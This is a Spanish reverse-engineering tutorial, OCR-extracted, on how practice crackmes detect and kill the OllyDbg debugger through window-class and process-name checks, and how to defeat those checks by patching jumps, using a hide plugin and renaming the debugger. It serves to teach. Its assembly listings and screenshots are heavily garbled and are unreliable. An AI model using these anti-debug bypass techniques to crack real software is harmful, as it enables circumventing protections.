Restart CtrHF2 

Close AIHF2 

Step into F7 

Step over Fs 

Animate into Cte? 
Animate over Ctrl+F8 

Execute till return CtrlF9 

Execute till user code AltF9 


FF75 08 PUSH DWORD PTR SS: CEBP+8] 

ES AAECFFFF CALL _kerne132. 70809922 

3945 ac CMP DWORD PTR_SS: CEBP+C],EAX 
6Fs4 12600300 | JE kernel32. 70848093 

8B45 AC MOU EAX, DWORD PTR SS: CEBP+C] 
F POP EDI 


SB POP EBX 

c9 LEAVE 

c2 0800 RETN_8 

3370 10 00 CMP DWORD PTR_SS: CEBP+10],0 
OF85 S1EGFFFF | JNZ kernel32. 70809315 


33FF XOR EDI,EDI 
E9 SIEGFFFF | UMP kernel32:7C809310 
8B4E 08 


MOV ECx+ DWORD PTR DS: [ESI1+8] 


Allí llegamos al RET y por supuesto en EAX esta la dirección de la api en nuestra maquina, que busca el 
programa, en este caso la de CreateToolhelp32SnapShot ya veremos cuando la utilice para que sirve esta 


api, por ahora pongámosle un BP, con BP EAX 


Registers (FPU) 


YC929REE ntdll.7C929AEB 
7C98C0D8 ntdll.7C98CODS 
7C800008 kerne 132. 70300900 
Bu12FFAC 

O012FFFO 

00403110 buggers3.50403110 


66463030 ASCII "CreateToolhelp32Snapshot” 
7CSBACS? kernel32.7C8BAC87 


B ES 0023 32bit B(FFFFFFFF) 
1 CS 0618 S2bit D(FFFFFFFEF) 
B— SS 0023 32bit B(FFFFFFFF) 
B— DS 0023 32bit BLFFFFFFFF) 
_ FS 063B 32bit FFODOGB(FFF) 
B 
B 


GS 4600 NULL 


LastErr ERROR_OLL_INIT_ZFAILED (666060454) 
EFL 00000206 (NO,NB,NE,A,NS,PE,GE, 6) 
STO empty —UNORM BCEO 61056104 0000BBBa 


Allí quedo puesto el BP en la api. 


ar EN 2% $08 9] + MI 


8BF MOU EDI,EDI 


PUSH _EBP 

MOU EBP,ESP 

SUB ESP, BC 

PUSH _ESI 

MOU_ ESTI, DWORD PTR SS: [EBP+C] 
TEST ESI,ESI 


75 B7 
ES S8251FAFF 
SBFaO MOU ESI,EAX 


8D45 FC LEA EAX, DWORD PTR SS: [EBP-4] 
50 PUSH EAX Ps 


DE 
HO 


JamATTO > 


Bueno esta ya sabemos que es peligrosa, pues para terminar el proceso, debe obtener el manejador o 
handle como vimos en la parte 20, y eso lo hace con OpenProcess, así que lleguemos al ret y pongámosle 


un BP EAX a esta api también. 


do4ulle> CALL to TOA from A pba6461123 


[male > 


Otra culpable de asesinato el primer grado, jeje, ya verán porque por ahora pongámosle un BP también 
con el mismo método y a su hermanita Process32Next. 


CALL to 
hModu le = 
ProcNameDrÚO 


_busgers3. 60401123 


mA ES 


tdll.7C 


CALL to s from buggers3.00461123 
hModu le = (55151515) (kerne 132) 
ProcNameOrOr 


154 


ntdll.7C920 


Esta ya sabemos que nos cerrara el OLLY, sin chistar no le ponemos BP porque antes debe pasar por las 
otras, pero es candidata al BP siempre y culpable seguro jeje. 


hModu le 


POC 


[Eñiod te - to 


|ntdll.7C9 


Otra reculpable jeje le ponemos un BP también con el método acostumbrado. 


Bueno y eso es todo, la próxima vez ya para en la api Create Toolhelp32SnapShot 


PUSH EBP 
nou ESP, ESP 


PUSH ESI. 
MOU EST. ¿Duogo PTR SS: [EBP+C] 


TEST ESL 


El stack 


L 
¡NAPPROCESS 
rcs16D4F 


DADO 


22intdAll 709 


Pues busquemos en el winapis32 que hace la dichosa api 


CreateToolhelp32Snapshot 


Takes a snapshot of the processes and the heaps, modules, and threads used by the processes. 


HANDLE WINAPI CreateToolhelp323napshot (DWORD dwFlags, 
DWORD th32ProcessID):; 


Parameters 
dwFlags 
Flags specifying portions of the system to include in the snapshot. These values are defined: 
TH320S_INHERIT Indicates that the snapshot handle is to 
be inheritable. 
TH3205_SNAPALL Equivalent to specifying the 1 


TH3205_SNAPHEAPLIST, 
TH3205_SNAPMODULE, 
TH32C5_SNAPPROCESS, and 
TH3205_SNAPTHREAD values. 
TH3205_SNAPHEAPLIST Includes the heap list of the specified 
process in the snapshot. 
TH3205_SNAPMODULE Includes the module list of the specified 
process in the snapshot. 
TH32C05_SNAPPROCESS Includes the Win32 process list in the 
snapshot. 
TH3205_SNAPTHREAD Includes the Win32 thread list in the 
snapshot. 


th32ProcessiD 
Process identifier. This parameter can be zero to indicate the current process. This parameter is used when the 
TH3205_SNAPHEAPLIST or TH3205_SNAPMODULE value is specified. Otherwise, it is ignored. 


Return Value 
Returns an open handle to the specified snapshot if successful or - 1 otherwise. 


Pues lo que hace esta api es tomar como una fotografía o instantánea (SNAPSHOT) de los procesos que 
están corriendo en la maquina, pero de esta foto, solo nos devuelve el handle o manejador de la misma ya 
que en los parámetros no hay ningún buffer donde guardara la lista de procesos, veamos lleguemos hasta 
el RET. 


Restart 


Close Al 
Step into FS 
Step over Fé 
¿nimate into Ci 
Animate over Ci 


ute till return 


A 
E 
c 
n 


Y en EAX devuelve el handle 


FERFEFFF 
7CS20738 ntd 


" PEGADO? kexrr 


m «mmm 
nm O0NOC 
TD 


Dn 5 
DI 


OMNDOO 
Dí 


Que es 2C en mi caso, podemos ver si esta en la lista de handles que esta usando el programa 


35 VYWIuuw Mel 


2ij 1jejmt]iwm]cf/Jk]8/r]»-/s] 3319] 


Apretamos el botón H que es la ventana de handles. 


00000015 Port. 


3. [001F0001 
47.|000FOB1F 


2. BBBFOBB? 
100. | OOBFOS7?F Miindows sl indowStat ionsWinStad 
500000028 | WindowSt at ¡on 100. | OOBFO37F MiindowsWindowStat ions WinStad 


Allí vemos el handle 2C que no nos aclara muy bien que es, pero bueno, el programa maneja el handle de 
la foto de la lista de procesos, veamos como accede a dicha lista hagamos RUN. 


[c] File View Debug EE puedo Window Help 


MOU EBP,ESP 
SUB ESP,238 
MOU EAX, DWORD PTR DS: [7Cs836CC] 
PUSH _ ESI_ 


Para en la api Process32First que junto con Process32Next son las encargadas de leer el resultado de la 
foto, e ir sacando la información de los procesos que están corriendo en nuestra maquina. 


CALL to ERIN from buggers3. 40 


hSnapshot = bbL 


¿¡ETUR 
3|ntdll. 
FFFFFFFF 


Bueno si miramos el Winapis32 vemos la info sobre esta api 


Process32Fi rst 


Retrieves information about the first process encountered in a system snapshot. 


BOOL VWINAPI Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe): 


Parameters 
hSnapshot 
Handle ofthe snapshot returned from a previous call to the CreateToolhelp32Snapshot function. 
hope l 


Address of a PROCESSENTRY32 structure. 


Allí dice que devuelve la información del primer proceso que encuentra en el snapshot o foto que se tomo 
anteriormente y que los parámetros son el handle de la snapshot que en mi caso es 2C y la dirección 
donde guardara la info o buffer que en mi maquina es 403134, 


4 


1403 34 [tenso entry 

604F| RETURN to kern 2 3 
7C920738|ntdl1.7C920738 
FFFFFFFF 
7FFDEGOA 


ol E 
dt 


pun 


Esta api solo devuelve la info sobre el primer proceso de la lista, para los siguientes se utiliza 
Process32Next que es la compañera de esta, en la tarea de leer los datos sobre los procesos. 


MUA La 00 00! 


4 
( 

4 
L 
4 
L 
4 
L 
4 
Í: 


y dh 


Allí esta en el dump, el buffer donde guardara la info sobre el primer proceso, así que ejecutemos hasta el 
RET para que guarde allí la info. 


¡DOE 
DOE 


Allí vemos el nombre del primer proceso de la lista que siempre es el proceso SYSTEM PROCESS 
continuemos con RUN. 


"Ol lyDbg” 
= NULL 


el32.7C31604F 


Ajaja aquí hay otro truco, en este caso usa la api FindWindowA y le esta preguntando si la ventana 
superior que esta a la vista, tiene OLLYDBG como clase de la misma, aquí podría preguntar por el 
nombre de la ventana también, ambos datos se encuentran en los parámetros, pero en este caso, pregunta 
por la clase de la ventana principal que esta en uso, que obviamente es la del OLLYDBG y cuya clase es 
OLLYDBG. 


Como podemos saber eso, pues usemos una utilidad que se encuentra en mi http 


http://www.ricnar456.dyndns.org/HERRAMIENTAS/V-W-X-Y-Z/WindowseGREATIS5setup.exe 


Yo se que hay plugins de OLLYDBG que permiten hallar la class y otros datos de una ventana, pero la 
verdad lo mas completo que vi es este programa veamos, lo instalo y lo arranco. 


* WinDowse 


| modules | Modify | Graphics | Options | About | 
Class | Parents | Children | Digger | Tree | 


Text OllyDbg - buggers3.exe - [CPU - main thread, mas 
Process ID 00000478 

App instance 00400000 

Handle 00130874 

Parent handle 00000000 

Control ID 174404D1 

Function 00000000 

Menu handle 174404D1 

Coords in parent — left:-4, top:-4, right:1028, bottom:738 
Coords in screen — left:-4, top:-4, right:1028, bottom:738 
Window size width:1032, height:742 

Client area size width:1024, height:684 

Style 17CFO000 


Extended style 00000110 

ws_overlapped | ws_visible | ws_clipsiblings | ws_clipchildren | 
ws_maximize | ws_border | ws_dlgframe | ws_sysmenu | 
ws_thickframe | ws_minimizebox | ws_maximizebox | 
ws_ex_acceptfiles | ws_ex_windowedge | ws_ex_left | 
ws_ex_ltrreading | ws_ex_rightscrollbar 


Refresh Save | 
"Y 


Vemos que en la ventana WINDOW nos da el nombre de la ventana del OLLYDBG y en la ventana 
CLASS nos da la clase de la misma. 


Executable | | Modify | Graphics | Options | About | 
Window Parents | Children | Digger | Tree | 


Name -OLLYDBG 


Function D04323D4 
Icon C62D025D 
Small icon 34430395 
Cursor 00010011 
Bkg brush 00000000 
Module handle 00400000 


Style 00000003 
cs_vredraw | cs_hredraw 


Icon Small icon Cursor 


E ES 


Detai Refresh | Save | | 
Stop Help | What's this | 


Que como vemos es OLLYDBG 


Vemos que la api FindWindowA nos devuelve el handle de la ventana, con lo cual ya sabemos puede 
cerrarla, o hacer lo que quiera con ella. 


FindWindow 


The FindWindow function retrieves the handle to the top-level window whose class name and window name match the 
specified strings. This function does not search child windows. 


HWND FindWindow( 


LPCTSTR ¡pClassName, ff pointer to class name 
LPCTSTR ¡pvWWindowName ff pointer to window name 
); 
Parameters 
pClassName 


Points to a null-terminated string that specifies the class name or is an atom that identifies the class-name string. Ifthis 
parameter is an atom, it must be a global atom created by a previous call to the GlobalAddAtom function. The atorn, a 
16-bit value, must be placed in the low-order word of pClassName, the high-order word must be zero. 


pWWindowName 
Points to a null-terminated string that specifies the window name (the window's title). Ifthis parameter is NULL, all window 
names match. 


Ifthe function fails, the return value is NULL. To get extended error information, call GetL astError. 


O sea no se necesita poner ambos datos el nombre y la clase, podemos buscar uno solo de los dos, y el 
otro se pone a cero como en nuestro caso. 


52% 


A UNICODE "y 
7C92056D ntdll.7C920 
00140603 
FFDEGDO 


3 ntdll. 


¡it BLFFFFFFFF 
tc BLFFFFFFFF 
tc DLFFFFFFFF 
it BDLFFFFFFFF 
it ?FFODOGB(F 


Am 
DO 


IOTFDTDO 


pr mada 110201 
” WinDowse Ela fx) 


Executable | Modules | Modify | Graphics | Options | About | 


purrnesunenanonransanenacenons| 


: ino il Class | Parents | Children | Digger | Tree | 


Text OllyDbg - buagers3.exe - [CPU - main thread, mos 
Process ID 00000478 

App instance 00400000 

Handle 00130874 

Parent handle 00000000 

Control ID 174404D1 

Function 00000000 

Menu handle 174404D1 

Coords in parent — left:-4, top:-4, right:1028, bottom:738 
Coords in screen — left:-4, top:-4, right:1028, bottom:738 
“Window size width:1032, height:742 

Client area size width:1024, height:684 

Style 17CFODOO 


Que por supuesto coincide con el que nos averigua el Windowse. 


Bueno traceemos a ver que hace el programa con el handle de la ventana 


. 68 RE304008 | PUSH buggers3. 1004030AE ASCII "Ol lyDbg" 

. FFIS ¿2314801 CALL_QUÓRO PTR DS: 14031281 user32.FindilindowA 
. 22F8 Ba 

. BBCO OR _EAX,EAX 

«75 04 


.«v| ?C 27 
.«V|EB 25 
+50 


PUSH EARX 
PUSH ESI 


y 


JA pr pa pa pu 


> 
a117Cl] . 57 PUSH EDI 
1170 . BF 61000000 |MOU EDI,1 
. BE 20314008 |MOU ESI,buggers3. 50403120 
> FF36 PUSH DWORD PTR DS: [ESIJ 
. FF1S 60314001 l|jgne 132. Freel ibrary 
. 8306 04 ADD ESI,4 
: DEC EDI 
e F2 
15] : 
61 . 
al . A Ba ExitCode = MB 
B119A| . 57000000 CALL <JMP.tkernel32.ExitProcess> Ex itProcess 
40119F]| > B6304060 |PUSH buggers3. 6Bb4030B6 ASCII ”OLLYDBG. EXE” 
011841 . 68 58314000 |PUSH buggers3.55403158 ASCII "[System Process]” 
B1189| . FF1S 24314001 kernel32. |strompA 
M11AF| . BBCO OR_EAX, EAX 
1 1 Bl Ch 22,2 MUA AAA MAA PUACAA PTA MUA O AMA A 


O sea compara si es cero, ese seria el caso de que no hubiera una ventana con la clase OLLYDBG o sea 
en ese caso correría pues no hay OLLYDBG, ahora, al hallar un handle que es diferente de cero, eso 
significa que hay una ventana con el Class OLLYDBG y salta a ExitProcess. 


ers3. B04030NE ASCII ”OllyDbg” 
user32.FindWindowA 
CMP_EAX, a 


OR_EAX, ERX 


PUSH ERX 
PUSH ESI 
PUSH_EDI 


Í fat rararararara mM EMT 4 


Al saltar allí va directo a la salida del programa sin haber mostrado aun nada. 


user3z.FindllindowA 
CMP_EAX, 0 
OR_EAX, EAX 


P 
[5]51515]515] EDI, 1 
314000 |MOU ESI,buggers3. 06483120 
FFS PUSH DWORD PTR DS: [ESIJ 
FF1S 60314001 
8306 4 


ADD ESI,4 
DEC EDI 


OO OO 


kernel32.FreeLibrary 


POP EDI 
POP ESI 


FR3S 3031400 PUSH DWORD PTR DS: [4031 


DIC 4 “ 


O sea que el tema es que al volver de FindWindowA, EAX debe ser cero y no saltar. 


Bueno el plugin HideDebugger 1.23f ahora que ya sabemos evitarlo a mano, también viene preparado, 
para esta detección, si vemos en las opciones del PLUGIN 


Hide Debugger [Opti... E 
Protect against: 
IsDebuggerPresent 


FindWindowEnumWindows 
eras 

O method 1 

O Method 2 
O Unhandled exception tricks 
O OutputDebuastring exploit 


O Detach 


Si ponemos la tilde en el segundo lugar vemos que nos protege contra la detección por medio de las apis 
FindWindow y EnumWindows que es la otra que detecta el nombre de la ventana, así que aprendimos a 
verlo a mano, a evitarlo, y a entender como funciona, ahora no le ponemos aun la tilde, porque 
deberíamos reiniciar el OLLYDBG para que haga efecto, lo haremos al terminar, por ahora hacemos que 
el salto que nos lleva a ExitProcess, no salte así continua el programa. 


IP 66401174 b 


D DD 


DOE 
DODDOD 


OOANNRNDDO m 


Do 

A 

> 

D 6 
+ 
m 


Hago doble click en el flag Z lo cual lo pone a 1 y hace que el JNZ no salte. 


EIP 6640117< 


CO ES 6uB2z 
B CS 0b1E 


GS BOB 


LastErx 
EFL 00000242 
STO empty 1 


Y ahora el JNZ no salta 


. FEF 31406 
. 83 ae CMP_EAX, a 
.  BBCE OR_EAX, EAX 
z .vr?5 
7] .v| FL 21 
a Ni 25 
a > +50 PUSH ERX 
a 56 PUSH ESI 
a 57 PUSH EDI 
a . BF MOU EDI. 1 


DI,1 
3 |MOU ESI¿buggers3. 00403120 
PUSH DWORD PTR DS:[ESIJ 


kerne (32. FreeLibrary 


EEN! buggers3. 1004030B6 
PUSH buggers3. 00403158 


ala]! 
OR_EAX, ERX 
202140 PISA AMARA PTR NS*Páa421271 


Bueno continuemos ya terminado el truco de FindWindowA ahora continuara con el de los nombres de 
los procesos demos RUN 


S|ntdll.7C 
FFFFFFFF 
TFFOEGGA 


Vemos que llama a Process32Next para ver el segundo proceso de la foto y guardara la info en 403134. 


Hagamos execute till return y veamos lo que guardo 


RETUIN TO WU4DLIFS LDUYGIECSS. YE 


essl.... 


pr 


JAM UNA a 


SACDACOAOA 


Ahora el nombre es SYSTEM y su PID es 4 veamos la lista de procesos 


NETFileserverEngine.exe 148 SYSTEM 00 18.644KB 
4 SYSTEM 216 KB 
( Y : 16 KB 


Allí esta veamos que hace con cada proceso volvamos al programa traceando 


di 


DB 06 
e E 


58314000 PUSH” buggers3. 004031583 
PUSH bu Ser=3. 00403100 


"| TEST EAX,EAX 
PUSH buggers3.604831CC 


PUSH DWORD PTR DS: [403120] 
CALL o PTR DS: [463108] 


NOBODO 
TODO 


15] 
PUSH buggers3. 0049830CD 
PUSH a ica: 


CALL EAX 
2 ES ÉSFEFFFF JMP buggers3. 00401195 
. ADD BYTE PTR DS: [EAXJ], AL 


C11 "not debuggedt 
I "not debuggedt” 


Do 


Vemos que aquí llama a la api IstrcmpA con la cual compara la string SYSTEM que es el nombre del 
proceso, con el la del crackme buggers3.exe, vemos que esa será la salida del crackme, cuando llegue a 
encontrar el nombre de su mismo proceso, pues ira a un MessageBoxA que vemos debajo que nos dice 
NOT DEBUGGED, pero aun no llegamos allí, así que sigamos traceando 


PUSH buggers3. 00403153 
PUSH buggers3.0504031A9 


E TEST EAX,EAX 
PUSH buggers3.B54831CC 


PUSH DWORD PTR DS: [403120] 
211441 MMIARA PTR NS: 14421 AR1 


EB 

ES 

EBP 

ESI 

EDI : tdll 
EIP 00481202 de 
CO bit 
P1 bit 
HO 1t 
Zz 0 bit 


> p68 B6364000 | PUSH buggers3.B04B30B6 ASCII ”OLLYDBG.EXE” 
68 58314000 [PUSH buggers3. 65403158 ASCII "System 
a 24314001 CALL DUORD PTR DS: [483124] kerne 132. |strompA 


OR_EAX, EAX 


75 2F 
FF35 30314001 PUSH DWORD PTR DS: [403130] 
6n Bl PUSH 1 


. 168 FFOF1FOO [PUSH 1FBFFF 

. |[FF1S 1431400 kerne 132. 0OpenProcess 
. |A3 64324000 |MOU DWORD PTR DS: [403264], EAXx 

. [64 00 PUSH A 

. |FF35 64324001 PUSH DWORD PTR DS: [403264] 

. |FF1S 2031400 

pS 


£A 06 
Es 16000000 
EB 


EMO MANTA AMA LIMA im 7 MANTA 


E 
HO Ex itCode = 8 
Ex itProcess 
hal 


Aquí vemos la parte caliente, compara el nombre del primer proceso con OLLYDBG.exe y si es igual, 
pues el resultado es cero y no salta, con lo cual ira a OpenProcess a ver el handle del mismo y luego a 
TerminateProcess para cerrarlo como vimos en la parte 20. 


. 58 

. 6A BB ExitCode = 

. ES 57000000 Ex itProcess 

> 68 B6304000 | PUSH buggers3.5040350B6 ASCII ”OLLYDBG. EXE” 
. 68 58314000 |PUSH buggers3.00403158 ASCII "System 

. FF1S5 24314001 kernel32, |strompA 

. BECA OR_EAX, EAX 

«175 | dNz SHORT buggers3.004011E2 


2F 
FF35 30314001 PUSH DWORD PTR DS: [463130] 
6A Bl PUSH 1 
63 FFOF1FOO (PUSH 1FOFFF 
FFiS 14314001 
AS 64324000 |MOU DWORD PTR DS: [403264],EAX 
£A Ba PUSH B 
FF35 6432400 
O 


5n Y 

Es 16000000 
EB 11 

68 34314000 |PUSH buggers3. 00403134 


FF35 5C324001 PUSH DWORD PTR DS: [40325C] 
O 


Paya 


kerne 132. 0penProcess 


kerne132.TerminateProcess 
HitCode = 8 


ExitProcess 


kernel32.Process32Next 


y 


Vemos que al no ser el primer proceso OLLYDBG.exe pues salta a Process32Next a buscar el segundo 
proceso lleguemos allí. 


, 
Í 55 PUSH_EBP 
MOU EBP,ESP 
SUB ESP,230 
MOV EAX, DWORD PTR DS: [7rCsse36CCc1 
PUSH_ESI 
MOV ESI,DWORD PTR SS: [EBP+CI 
TEST ESI,ESI 
MA MINRA PTR SS: PFRAP-41. FAX 


2BEC 
rá S1EC 30020000 
Al CCS6SSTC 


ac 
Fr 


NODO 


NMDOAD 
DJ 


DON 


DON 
Di 


El segundo proceso es smss.exe y su PID es 026C si vemos en la lista de procesos 


Csrss.exXe 676 SYSTEM 00 3.116 KB 
me O SETE 00 100K8 
winhip32.exe 580 Ricardo DO 1,9584 KB 
ComprosScheduler.exe 520 Ricardo 00 1.020 KB 
fdm.exe 484 Ricardo 00 5,860 KB 
GoogleDesktop.exe 468 Ricardo 00 640 KB 


.o mo 1 me e. maes 


Allí esta el PID es 620 decimal o sea 026C en hexa 


Bueno pues repetirá lo mismo con todos los procesos que hay en la maquina uno a uno los comparara con 
OLLYDBG.exe 


50 100 5 EJ E UE EA E] rr 


5A UB 

Es 57000000 
63 B6304000 
638 58314000 


63 FFOF1FOD 
AS 64324000 
5A 60 


DDD 


6A 0u 
Es 16000000 
EB 11 
+68 34314000 


PRO 


FF1S 24314001 


FF1S 14314001 


PUSH buggers3. 004030B6 
PUSH buggers3. 00403158 


OR_EAX, ERX 


FAS 2F | 
FF35 30314001 PUSH DWORD PTR DS: [403130] 
6A Bl SH 1 


PU 

PUSH 1FOFFF 

MOV DWORD PTR DS: [403264], EAX 
PUSH O 


FF35 64324001 PUSH DWORD PTR DS: [403264] 
FF1S 20314001 CALL DWORD PTR DS: [403120] 


PUSH O 


PUSH buggers3. 00403134 


FF35 5C324001 PUSH DWORD PTR DS: [40325CJ 


Ex itCode = 
ARE, 

ASCII ”OLLYDBG. EXE” 
ASCII "smss.exe” 
kernel32. [strompA 


kerne 132. 0penProcess 


kernel32.TerminateProcess 
ExitCode = M 
ExitProcess 


Y siempre el resultado de la comparación nos llevara al salto condicional de 4011b1 el cual cuando halle 
el proceso OLLYDBG.exe no saltara y nos cerrara el OLLYDBG, así que podemos cambiarlo por un 
JMP, lo cual evitara que se cierre. 


pal 


Es 57000090 


.. . q. 


la] 
FF1S 24214001 É 
DECO 


3 


EB 2F | 
FF35 30314001 
6A al 

68 FFOF1FOO 
FFiS 14314001 
AS 64324000 

6A 00 

FF35 64324001 
FF1S 20314001 
6A uu 

Es 16000000 

EB 11 

68 34314000 


FF35 S5C324001 
FF1S 10314001 
rn on 


o loas 
EE 


PUSH 8 


ERE buggers3. 00403086 
USH buggers3. 60403158 


OR_EAX, EAX 

JMP SHORT buggers3.004011E2 
PUSH DWORD PTR DS: [463130] 
PUSH 1 

PUSH _1FOFFF 

Ia DWORD PTR DS: [403264], EAX 
PUSH OWORD PTR DS: [403264] 


PUSH 6 


PUSH buggers3. 50403134 
PUSH OWORD PTR DS: [403250] 


Ahora si desactivamos todos los BP y damos RUN 


not debugged! [IX] 


not debugged! 


ExitProcess 

ASCII ”OLLYDBG. EXE” 
ASCII "smss. exe” 
kernel32. |strompA 


kerne 132. OpenProcess 


kernel132. TerminateProcess 
ExitCode = B 
ExitProcess 


kernel32.Process32Next 


Con lo cual la protección ha sido vencida, ahora ya sabemos que con el plugin HideDebugger nos 
ocultara la ventana del OLLYDBG de la detección de FindWindowA y usando el OLLYDBG 
renombrado como PIRULO.exe no detectara ningún proceso llamado OLLYDBG, por lo cual allí debería 
correr sin problemas, veamos. 


Abramos el PIRULO.exe 


Hide Debugger [Opti... 


Protect against: 


IsDebuggerPresent 
FindWindow/EnurnwWindows 
O TerminateProcess 


Oetos1 Po 


One 


O Unhandled exception tricks 
O OutputDebugString exploit 


O Detach 


Coloquémosle la tilde en la opción para ocultar de la api FindWindowA y apretemos SAVE 
Hide Debugger X 


A ) You must restart OllyDbg for the changes to take effect, 


Pues reiniciémoslo cerrándolo completamente y volviéndolo a abrir 


5 - NS 24 TN" a DWORD PTR SS: [ESP+24] 
BFB7S1 30 AOUZS | ÉDx, WORD _PTR DS: [ECX+3C] 


El 34 CMP ECX, DWORD PTR_DS: [EDX+ECX+34] 
3900 30314001 MOU DWORD PTR DS: [463130], ECxX 

56 PUSH ESI 

57 
53 
3BF9 
B37F 30 ADD EDI,DWORD PTR DS: [EDI+3C] 
3B7F 78 MOU EDI,DWORD PTR DS: [EDI+78] 


ara 


Y cargo el buggers3 pero antes me voy a sacar una duda, voy a ver con el Windowse, que cambios realizo 
el plugin en la ventana del OLLY para que no sea detectada 


- WinDowse 
Executable | Modules | Modify | Graphics | Options | About | 


Window | Class | Parents | Children | Digger | Tree 
Process ID DODODEF4 
App instance 00400000 
Handle DDESO3CC 
Parent handle 00000000 
Control ID D64107F9 
Function 00000000 


Vemos que ahora no aparece el nombre OLLYDBG en el titulo de la ventana y la clase ? 


-” WinDowse 


Name 

Function 004323D4 
Icon 012C0629 
Small icon 194D07D9 


Cursor 00010011 


Vemos que por el lado de la clase no nos protege para nada debemos hallar otra cosa. 


La herramienta que no es un plugin que nos ayuda con esto es el Repair 0.6, es un parcheador de 
OLLYDBG que se encuentra en mi http aquí 


http://www.ricnar456.dyndns.org/HERRAMIENTAS/Q-R-S-T-U/repair0.6.zip 


Si lo bajamos y cerramos el OLLYDBG y arrancamos el parcheador 


y RE-Pair 0.6: IDP not "fix... X] 


What tool would you like to change? 


O Filemon € SmartCheck Pa di e 


Region (* OllyDbg C In Memory 
[Y Start tool after patching. 
[Y Rename tool. 


RE-Pair by Crudd[RET] 2005 


Buscar en: | (Ly Mis documentos y] a 


fo) (SHANEXOS (SLinkFerret 
4 (5 AquaMark3 (MERLO 
Documentos (ARCHIVOS DE AMERICA (E) Messenger Service Received Files 
recientes (Sasprotect 1.3 plugin_archivos 3 Mi música 
(3 (EHBars (5 Mis archivos recibidos 
ál (Compro DYD 2 (2 Mis imágenes 
Escritorio | vis vídeos 
" (Morpheus Playlists 
Tamaño: 102 MB Sw Celador 
A [ro 9rPetas: ... (My eBooks 
Mis documentos | Archivos: ... EMy 150 Files 
(S)HUMBOLDT (My Music 
5) ICO Lite (S5My PaperPort Docurnents 


ES | > 
E 
Mis sitios de red — Tipo: [OlDbg y] Cancelar | 


[Abrir como archivo de sólo lectura 


Buscar er E odbg110 y | e 1 Ely 
E OLLYDBG.EXE 


Documentos 
recientes 


(4 LS 


Re-Pair by Crudd[RET] 


Patched version of OllyDBG has been renamed to Nvp11.exe 


Bueno así que tenemos un tercer OLLYDBG parcheado que se llama NVP11.exe veamos en la carpeta 
del OLLYDBG donde esta 


Nivel1.udd 
Archivo UDD 
10 KB 


2-bit analysing debugger 


OLLY-BP.exe 


OLLYDBG.bak 
Archivo B4K 
3.206 KB 


OLLYDBG.EXE 
OllyDbg, 32-bit analysing debugger 


ollydbg.GID 


2281 | Archivo GID 


Archivo de Ayuda 
289 KB 


ollydbg.ini 
Opciones de configuración 
O KB 


OLLYDBG.udd 
Archivo UDD 
3.206 KB 


PIRULO.EXE 
OllyDbg, 32-bit analysing debugger 


Allí esta, abrámoslo y veamos que CLASS tiene el mismo 


” WinDowse 
Executable | Modules | Modify | Graphics | Options | About | 


Window 3 Parents | Children | Digger | Tree 
Name 

Function 004323D4 

Icon D7E2054B 

Small icon 119707FB 

Cursor 00010011 

Bkg brush 00000000 

Module handle 00400000 

Style 00000003 


cs_wredraw | cs_hredraw 


Vemos que tiene como CLASS Nvp11 y por supuesto el nombre del proceso también es ese, por lo cual 
el buggers3 debería correr aquí perfectamente sin cambiar nada, probemos 


- [CPU - main thread, module buggers3] 


[e] File View Debug Plugins Options Window Help 


als! CPE EE! PEE! 1/Elm)T)w)H1e17/K]8)R))'8 


DEC 
Sre7S1 3c ADUZR “énx, WORD_PTR DS: [ECX+3C] 
EEE 34 CMP ECX, DWORD PTR DS: [EDX+EC%+34] 


5 

390D 30314061 MOV DWORD PTR DS: [4031307,ECX 
56 PUSH ESI 

PUSH EDI 
PUSH_EBX 
MOV EDI, ECX 


not debugged! 


not debugged! 


Quiere decir que nuestro OLLYDBG parcheado, es cada día menos detectado, al menos ya no se lo puede 
detectar ni por el nombre del proceso OLLYDBG ni por el titulo ni la clase de la ventana, jeje en la parte 
22 seguiremos fortificando nuestro OLLYDBG y aprendiendo como funcionan mas detecciones 
antidebugger, como entenderlas, arreglarlas a mano y al final con algún plugin , para evitar trabajar de 
mas jeje. 


Hasta la parte 22 
Ricardo Narvaja 
27 de diciembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG parte 22 


Bueno seguiremos con mas trucos antidebugging en esta parte veremos dos trucos antidebugging 
simultáneamente, ya que uno trabaja con el otro, por lo tanto estudiaremos los dos. 

Es de mencionar que siempre estamos dando por sabido todo lo visto anteriormente y que iniciaremos 
este tute con el OLLYDBG que parcheamos en la parte 21, que se llama NVP11, con el plugin 
HideDebugger 1.23f por ahora configurado así. 


Hide Debugger [Opti... 


Protect against: 


IsDebuggerPresent 
FindwWindow/EnumwWindows 
O TerminateProcess 


o 
o 


O] Unhandled exception tricks 
O outputDebuaString exploit 


O Detach 


Allí vemos que hay una tilde llamada UNHANDLED EXCEPTION TRICKS, bueno estudiaremos este 
truco, a su vez que trabaja conjuntamente con otro truco que podemos encontrar también usado en forma 
separada, es el llamado a la api ZwQueryInformationProcess para detectar el debugger. 


Usaremos el crackme adjunto llamado sphynx.zip, ya sabemos desde aquí que si le ponemos la tilde en 
UNHANDLED EXCEPTION TRICKS corre perfectamente, pero veremos un poco como trabajan ambos 
métodos. 


Otra cosa de aclarar que estos crackmes que no estamos solucionando, los veremos mas adelante, por 
ejemplo este necesita para solucionarse usar el método de fuerza bruta para hallar el serial correcto, y es 
posible que lo usemos como ejemplo cuando veamos ese método de ataque, por ahora solo lo haremos 
correr en OLLYDBG y explicaremos su método de protección. 


ex] e jul vij+il $0] $ ELLEEEECLELEO ESF 


68 068114000 |PUSH Sphun«.00401108 plevelfilter = Sphynx.00401108 
sn pati A andledexcept ienPi lter 


$n 66 push a D 
£5A 00 P 
éS 3204000 | PUSH Sphunis 00403039 F 
0 
F 


68 46304000 | PUSH Sphynx. 00403046 

£A 00 PUSH a 

Es 99010000 | CALL <IMP-Eshel132.ShellERecUteA>? Sh 

£6A Ba PUSH a pi 

Es ebo1oo0a | CALL-<JMP-Skernel32.GetModuleHandleA> Gethoda LeHandlen 
AS 50304000 US DWORD PTR DS: [403050], EAX 


6A 6u 

68 40104000 |PUSH Sphynx. 00401040 
5A 0u PUSH O 

63 B6304000 [PUSH Sphynx. 00493090 


NULL 
rn 


FF3S 59304001 PUSH DIVORD PTR DS: [403050] NUI 

Es 44010000 | CALL-<JMP.Suser32.DialosBorParamA) BialcoñonParana 
E] PUSH EAX itCode 

ES 56010000 no En itProcess 
88EC _. ....[MOY EBPLESP__ 


Cargo el crackme en el Nvp11 (OLLYDBG parcheado) y verifico que las opciones del plugin 
